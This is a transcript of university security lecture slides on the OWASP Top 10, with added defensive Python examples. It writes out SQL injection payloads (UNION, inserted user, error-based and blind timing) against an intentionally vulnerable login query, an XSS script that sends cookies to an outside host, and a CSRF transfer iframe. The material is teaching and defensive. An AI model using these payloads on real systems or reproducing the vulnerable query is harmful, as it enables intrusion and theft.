Information Security. Gabriel Lawrence Director, IT Security UCSD


Director of IT Security, UCSD. Three startups (2 still around!). Sun Microsystems (consulting and JavaSoftware). Secure Internet applications.

Don't go to jail! Some of the things I'm going to talk about are OK against your own applications... but would be bad against someone else's.

Internet security is new... no really. ARPANET's first two nodes went live in 1969; modern infosec didn't roll around until 1988.

First major worm: Morris Worm, 1988. Web server worm: Code Red, 2001. Web app worm: Asprox, May 2008. Network security: 1988-2008. Web security (browser and web apps): 2008-. Asprox attacked web apps using SQL injection.

What is information security? Why do we care? Protecting assets from risk using people, process and technology.

SDLC: Requirements, Architecture/Design, Coding, Integration Testing, Deployment, Long Term Support. Agile development has smaller cycles... but software development generally follows these major phases. Requirements: what you are going to build. Architecture/Design: how. Coding: doing it. Integration Testing: making sure the overall build works. Deployment: shipping it. Long Term Support: you can never really be done!

Where was security again? I know... this guy is supposed to be a security guy and he didn't show it in the SDLC slide... What's up with that?

Security is part of every step in the SDLC

Requirements concretely define security expectations: data definition, handling, storage, Auth^2 (authentication and authorization), logging. Threat modeling may be a tool to use here, depending on how sensitive the application is, how large the development team is, or how formal the methodology is. It could straddle the Requirements and Architecture/Design effort. http://www.owasp.org/index.php/threat_risk_modeling 1. Identify security objectives: Auth^2, how much risk will you take? Reputation? Privacy and regulatory compliance? Availability? 2. Analyze the requirements/app design for components, data flows and trust boundaries. 3. Decompose the app into features and modules and identify the ones where security matters. 4. Identify threats. 5. Decide what you do about them - there are different mechanisms to accomplish this...

Architecture/Design should identify security characteristics and critical security features. Examples: user IDs for database access... a normal user ID and a sensitive user ID. Identify trusted communication paths and trust boundaries. Identify how Auth^2 is accomplished and where - universal enforcement.

Use secure coding practices. Security and quality are often the same thing: how does your software deal with expected and unexpected inputs? Unit tests should test good and BAD inputs. Threat models? CODE REVIEWS!

Integration testing is a good point to test the big picture. Quality - does it do what it's supposed to? Does it do other things? Automated tools - application scanners. Hand testing - be evil.

Deployment: traditional InfoSec. Security around the database user IDs? N-tier or 1-tier? Firewalls? OS hardening? Log management? Patch management? Fault tolerance? Configurations? Vulnerability scanning?

Don't forget about your application: component updates? New threats? New attacks? Biggest risk here!

What does it mean to be evil? Developers and traditional IT tend to think about: does the feature work? Is the system up? Does it do what the user wants? Attackers come at it from a different direction: what happens when I give it bad input? How does it fail? What can I do when it's failing? What else can I make this system do? Abusing trust.

OWASP and the Top 10. Open Web Application Security Project - owasp.org. Top 10 - the top 10 risks, not the top 10 weaknesses.

A1 - Injection: SQL, OS/command, LDAP. Untrusted data is sent to an interpreter as part of a command/query; the interpreter gets confused about what's data and what's code and executes some hostile data.

...
// Assumed from context (this line is elided on the slide): the username array the
// code below reads; "uname" is a guess at the request parameter name.
String[] unamearr = request.getParameterValues("uname");
String[] pwordarr = request.getParameterValues("pword");
if (unamearr.length == 1 && pwordarr.length == 1) {
    // Vulnerable on purpose: the submitted username is concatenated straight
    // into the SQL text, so the database parses whatever the user typed as SQL.
    res = stm.executeQuery("SELECT * FROM users WHERE username = '" + unamearr[0] + "'");
}
...

SELECT is used to select data from a table. Syntax: SELECT [ALL | DISTINCT] column_name1 [, column_name2 ...] FROM table_name1 [, table_name2 ...] [WHERE condition [AND | OR condition ...]] [GROUP BY column_list] [HAVING conditions] [ORDER BY column_list [ASC | DESC]]

select uname, password from users. select uname, password from users where uname='gabe'. SQL comments are stuff the database ignores: select uname, password from users where uname='gabe' -- this is a comment...

"SELECT * FROM users WHERE username = '"+unamearr[0]+"'"

unamearr[0] = gabe gives: Select * from users where username='gabe'

unamearr[0] = ' (a lone single quote) gives: Select * from users where username=''' Exception!

UNION puts the results of two selects together. Syntax: SELECT [ALL | DISTINCT] column_name1 [, column_name2 ...] FROM table_name1 [, table_name2 ...] [WHERE condition [AND | OR condition ...]] UNION SELECT [ALL | DISTINCT] column_name1 [, column_name2 ...] FROM table_name1 [, table_name2 ...] [WHERE condition [AND | OR condition ...]]

unamearr[0] = ' union select gabe, pass -- gives: Select * from users where username='' union select gabe, pass --'

unamearr[0] = '; insert into users (username,password) values ('badguy','pass');

Error Based SQL Injection. unamearr[0] = ' union select cast(version() as int), pass -- ERROR: invalid input syntax for integer: "PostgreSQL 8.3.7 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.3-5ubuntu4) 4.3.3" You can get an actual error message back... so make useful information appear in the error message. NOISY. EASY.

Blind SQL Injection. unamearr[0] = '; select pg_sleep(10) where exists (select table_name from information_schema.tables where substr(table_name,1,1)='p') -- The error is handled by the app, but the SQL is still run. Ask a series of yes/no questions: is there a table whose name begins with A? Is there a table whose name begins with B? Long and painful... so write a program :-)

http://sqlmap.sourceforge.net/ http://michaeldaw.org/sql-injection-cheatsheet http://sla.ckers.org/forum/

Parameterized queries. Stored procedures (but watch for eval inside them!). Escape special characters (OWASP ESAPI).
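To show why parameterized queries are the fix, here is an added example (not code from the slides) that rebuilds the slide's lookup two ways against a constructed in-memory SQLite table: once by string concatenation, as in the Java snippet above, and once with a bound parameter. The UNION input from the slides dumps every row through the first version and matches nothing through the second; the lone-quote input throws only in the first. The table rows and the "uname"/"password" column names are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for the slide's "users" table.
SAMPLE_USERS = [("gabe", "s3cret"), ("alice", "hunter2")]


def make_db():
    """Build an in-memory SQLite database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, uname):
    """String concatenation, as in the slide's Java snippet: the user's input
    becomes part of the SQL text, so the parser can be made to read it as code."""
    sql = "SELECT uname, password FROM users WHERE uname = '" + uname + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, uname):
    """Parameterized query: the SQL text is fixed and the value travels as a
    bound parameter, so it is compared as data and never parsed as SQL."""
    sql = "SELECT uname, password FROM users WHERE uname = ?"
    return conn.execute(sql, (uname,)).fetchall()


def stray_quote_raises(conn, lookup):
    """True if the slide's lone-quote input makes `lookup` throw (the
    'Exception!' case): the tell-tale sign that input is being parsed as SQL."""
    try:
        lookup(conn, "'")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    payload = "' UNION SELECT uname, password FROM users --"  # the slide's UNION trick
    print("normal lookup          :", lookup_parameterized(conn, "gabe"))
    print("vulnerable + payload   :", lookup_vulnerable(conn, payload))      # every row
    print("parameterized + payload:", lookup_parameterized(conn, payload))   # []
    print("vulnerable throws on ' :", stray_quote_raises(conn, lookup_vulnerable))
    print("parameterized throws   :", stray_quote_raises(conn, lookup_parameterized))
```

The same split applies to the stored-procedure option on the slide: a procedure that builds SQL from its arguments with eval or EXECUTE is the concatenation case again, just moved into the database.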

A2 - Cross Site Scripting (XSS): the app takes untrusted data and sends it to the browser. * User data entered into a form * Data injected into the database (see Asprox) * Data from an external feed. Allows an attacker to modify web pages, steal data and redirect the web browser.

JavaScript: first deployed in the browser in December 1995. Now standardized as ECMAScript. A prototype-based scripting language, loosely based on C (the "Java" in JavaScript is marketing: although there is a link between Java and JavaScript, they are separate languages).

JavaScript in the browser: most commonly used in web browsers for client-side scripting. Also in PDF, Adobe Creative Suite, JDK 1.6, Dashboard widgets on OS X, Adobe AIR. Browsers come with standard objects: browser objects (window, document), HTML event handlers, the Document Object Model, XMLHttpRequest.

Document Object Model: the standard object model for HTML and XML documents. Supported in all browsers. Allows JavaScript to read and change the contents of web pages. Defines an event model that allows JavaScript to interact with the user.

Communicating across the network: JavaScript can load images, JavaScript can submit forms, iframes, XMLHttpRequest, other methods...

JavaScript Security Model: the browser has a security policy that governs what JavaScript can do. The Same-Origin Policy prevents scripts loaded from one web site from interacting with a document loaded from a different site. Scripts loaded from other sites are restricted to the origin of the document that loaded them, not the place the script was hosted. Same origin applies to accessing embedded documents (window, iframe, layer, ilayer). Same origin doesn't prevent a script from loading a window, iframe, layer or ilayer from another site.

Poor Man's Page Defacement: document.location controls what content is in the current window. What would happen if we put <script>document.location="http://www.cnn.com"</script> in a field that gets stored and shown to users of the site?

Stealing data: <script> var myimage = new Image; myimage.src="http://www.landq.org/"+document.cookie+"---"+document.location; </script>

Output filtering: different filtering for each output destination - CSS, JavaScript, HTML, JSON.

But I want HTML formatting! Use wiki markup (becoming standard). Use HTML entities for odd characters. Whitelist: define what tags are allowed, define what attributes are allowed, strip everything else. Your code produces the markup, so you are in control.
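The two slides above (per-destination output filtering, and a whitelist when HTML formatting is wanted) are illustrated by this added example, which is not part of the original deck. It has one encoder per output context (HTML body/attribute, JavaScript string literal, URL parameter) and a small whitelist sanitizer built on the standard library's HTMLParser that re-emits only the tags and attributes it knows, drops event-handler attributes and non-http(s) links, and closes anything the input left open. The tag whitelist (b, i, p, a with href) is the example's own choice.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import quote, urlsplit


def encode_for_html(value):
    """For text landing in an HTML body or a quoted attribute: &, <, >, ", ' become entities."""
    return html.escape(value, quote=True)


def encode_for_js_string(value):
    """For text landing inside a JavaScript string literal in a <script> block.
    json.dumps yields a quoted, escaped literal; "</" is additionally broken up so
    the value can never contain a closing </script>, and the two Unicode line
    terminators that JSON allows but JS string literals do not are escaped."""
    literal = json.dumps(value)
    return (literal.replace("</", "<\\/")
                   .replace("\u2028", "\\u2028")
                   .replace("\u2029", "\\u2029"))


def encode_for_url_param(value):
    """For text landing in a URL query parameter: percent-encode all but unreserved chars."""
    return quote(value, safe="")


# Whitelist for the "but I want HTML formatting" case: tag -> attributes allowed on it.
ALLOWED_TAGS = {"b": set(), "i": set(), "p": set(), "a": {"href"}}
ALLOWED_HREF_SCHEMES = ("http", "https")


class WhitelistSanitizer(HTMLParser):
    """Rebuilds the fragment from scratch: only whitelisted tags and attributes
    are re-emitted, text is entity-encoded, and everything else is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # whitelisted tags emitted but not yet closed

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                      # tag stripped; its text still flows through handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue                # onclick, onerror, style, ...: never re-emitted
            if name == "href" and urlsplit(value).scheme not in ALLOWED_HREF_SCHEMES:
                continue                # drops javascript: and data: links
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return
        while self.open_tags:           # also close anything left open inside this tag
            inner = self.open_tags.pop()
            self.out.append("</%s>" % inner)
            if inner == tag:
                break

    def handle_data(self, data):
        # Entities were decoded on the way in, so re-encoding here defeats &lt;script&gt; tricks.
        self.out.append(html.escape(data, quote=True))

    def result(self):
        while self.open_tags:           # close tags the input left dangling
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_html(fragment):
    """Return a safe HTML fragment built only from whitelisted markup."""
    parser = WhitelistSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()
```

The sanitizer never copies input markup through; it generates its own, which is the "your code produces the markup" point on the slide. A relative href is dropped too, since only absolute http(s) links are on the whitelist.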

A3 - Broken Authentication and Session Management. Jump past the login page. No security around assets - images and video streams (for performance, or because of a 3rd party package...). Data in session cookies: username? What happens if I change it? Application timeouts... the user walks away. Does not use SSL/TLS for all traffic - just login? Then the session cookie is stealable. Session ID in URLs: emailed to others... pwned. Watch out for XSS!

A4 - Insecure Direct Object References: parameter tampering. http://www.example.com/view.jsp?itemid=10

A5 - Cross Site Request Forgery. <iframe src="http://yourbank/transfer.asp?from=checking&to=08809988&amount=1000000"></iframe> Use a random hidden value, or nonce, in the form; the JavaScript security model will protect it, so that there is a secret parameter that can't be predicted or known by the malicious folks.
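As an added example (not from the slides), the nonce defence above together with the session-cookie points from A3 and the secure-flag point from A10: a per-session CSRF token derived by HMAC from the session ID, the hidden form field that carries it, a Set-Cookie line with the Secure, HttpOnly and SameSite attributes, and the check a transfer-style request must pass. The server key, the origin "https://yourbank.example" and the "csrf_token" field name are this example's assumptions; the key is generated at import time only so the code runs offline.

```python
import hashlib
import hmac
import html
import secrets

# Assumed deployment secret: generated here so the example runs stand-alone; a real
# app loads it from a key store so it stays stable across restarts and instances.
SERVER_KEY = secrets.token_bytes(32)
OUR_ORIGIN = "https://yourbank.example"   # hypothetical origin standing in for "yourbank"


def new_session_id():
    """Unpredictable session ID: 256 bits from the OS CSPRNG."""
    return secrets.token_urlsafe(32)


def session_cookie_header(session_id):
    """Set-Cookie line for the session. Secure: sent only over TLS (A10).
    HttpOnly: not readable by injected script (A2). SameSite=Lax: not attached
    to cross-site POSTs, which already blunts the iframe trick in modern browsers."""
    return "Set-Cookie: session=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % session_id


def csrf_token_for(session_id, key=SERVER_KEY):
    """Per-session nonce: HMAC-SHA256(key, session ID). Unpredictable without the
    key, bound to this session, and needs no server-side storage."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def hidden_field(token):
    """The hidden input the legitimate page embeds in its form; the same-origin
    policy keeps a page on another site from reading it out of ours."""
    return '<input type="hidden" name="csrf_token" value="%s">' % html.escape(token, quote=True)


def is_state_change_allowed(method, session_id, submitted_token, origin_header, key=SERVER_KEY):
    """Gate for a state-changing request such as the transfer: it must be a POST,
    must come from our origin if the browser sent an Origin header, and must
    carry the token that belongs to the caller's session."""
    if method != "POST":
        return False                     # the slide's iframe is a plain GET
    if origin_header is not None and origin_header != OUR_ORIGIN:
        return False
    if not submitted_token:
        return False
    expected = csrf_token_for(session_id, key)
    # Constant-time compare so the check itself leaks nothing about the token.
    return hmac.compare_digest(expected.encode(), submitted_token.encode())


if __name__ == "__main__":
    sid = new_session_id()
    print(session_cookie_header(sid))
    print(hidden_field(csrf_token_for(sid)))
    print("forged GET from iframe :", is_state_change_allowed("GET", sid, None, None))
    print("legit POST with token  :", is_state_change_allowed("POST", sid, csrf_token_for(sid), OUR_ORIGIN))
```

The token is tied to the session rather than stored per request, so it survives load-balanced deployments; rotating the session ID at login automatically rotates the token with it.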

A6 - Security Misconfiguration: did you get the deployment step right? Did you remove all the testing code?

A7 - Failure to Restrict URL Access. Comcast example. Is Auth^2 properly applied? Policies need to be flexible to adapt to business needs: role based, so you don't have to twiddle every user; a proper business situation for access. Default deny!

A8 - Unvalidated Redirects and Forwards: user parameters in the URL include redirects; links look like your site, but send you to evil.com.

A9 - Insecure Cryptographic Storage: right cryptographic algorithm? Key management? Data at rest? Using a valid cert (sort of a config issue...).

A10 - Insufficient Transport Layer Protection: session cookies have the secure flag set; legit server cert; require SSL... don't let them land on the non-SSL site. Backend communication???

Error Page Handling: set up a global error handler. Control the information leaked out. Ability to do additional logging and notification. Doing it globally assures that it is applied consistently. Not enough on its own to protect from problems.
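An added example (not from the deck) of the global error handler described above: the full exception and traceback go to the server log under an incident reference, a notification hook fires for unexpected failures, and the client gets only a generic page carrying that reference. The PostgreSQL-style message it is fed is constructed to mirror the error-based injection slide, where a raw database error reached the user. The NotFound/Forbidden types and the notify callback are this example's assumptions.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app.errors")


# Hypothetical application exception types: known ones map to a client status,
# anything else is treated as an unexpected failure and reported as 500.
class NotFound(Exception):
    pass


class Forbidden(Exception):
    pass


STATUS_FOR = {NotFound: 404, Forbidden: 403}


def handle_error(exc, request_path, notify=None):
    """Global handler: log everything server-side, tell the client almost nothing.

    Returns (status, html_body, incident_id). `notify`, if given, is called with
    (incident_id, summary) for unexpected failures so someone gets paged."""
    incident_id = uuid.uuid4().hex[:12]
    status = STATUS_FOR.get(type(exc), 500)

    # Full detail, including the stack, stays in the server log keyed by the reference.
    log.error("incident=%s status=%d path=%s\n%s", incident_id, status, request_path,
              "".join(traceback.format_exception(type(exc), exc, exc.__traceback__)))

    if status == 500 and notify is not None:
        notify(incident_id, repr(exc))

    # The client page never includes the exception text, the path or the stack:
    # exactly what the error-based injection slide shows an attacker reading.
    body = ("<h1>Sorry, something went wrong</h1>"
            "<p>Please quote reference %s if you contact support.</p>" % incident_id)
    return status, body, incident_id


if __name__ == "__main__":
    db_error = RuntimeError('invalid input syntax for integer: "PostgreSQL 8.3.7 ..."')  # constructed
    status, body, ref = handle_error(db_error, "/login", notify=lambda i, s: print("PAGE:", i, s))
    print(status, ref)
    print(body)
```

Wire this in as the one catch-all at the framework level (servlet error-page mapping, middleware, or equivalent) so every unhandled exception takes this path, rather than relying on each handler to catch its own.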

Check out owasp.org

Questions?